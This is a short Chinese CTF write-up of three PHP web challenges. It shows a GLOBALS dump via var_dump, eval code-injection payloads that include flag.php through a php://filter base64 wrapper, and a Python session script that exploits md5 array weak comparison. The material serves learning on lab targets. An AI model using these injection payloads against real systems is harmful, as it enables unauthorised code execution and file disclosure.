WeB学习3

1.**1

Var_dump()函数，显示变量的信息包括类型和具体内容
因此可以向hello传参hello=GLOBALS
$GLOBALS变量是一关联数组，存储有关所有变量的信息

可得flag

2.**2

eval()具可以去掉双引号执行其中的代码
因此可以构造

1. hello=file(“flag.php”)
2. help=);include(@$_POST[‘b’])
   然后post b=php://filter/convert.base64-encode/resource=flag.php
3. hell=);include(“php://filter/convert.base64-encode/resource=flag.php”)
   

3.**3

分析可知:SESSION是保持一次会话nums的值一直被储存，因此可对value手动进行十次复制满足条件，即可得到flag
也可以写脚本
import requests
s=requests.session()

url=‘http://0993a985319446889263ad893181352036df859756b6405d.game.ichunqiu.com/?value[]=’

a=s.get(url+‘ea’)
for i in range(11):
b=s.get(url+a.text[:2])
a=b
if ‘flag{’ in a.text:
print(a.text)

条件分析：

Md5(value[])作用等于null弱等于0
?Value[]=ea是传入一个字符串与
?value=ea一般用于构造变量间的关系
.是字符串连接符号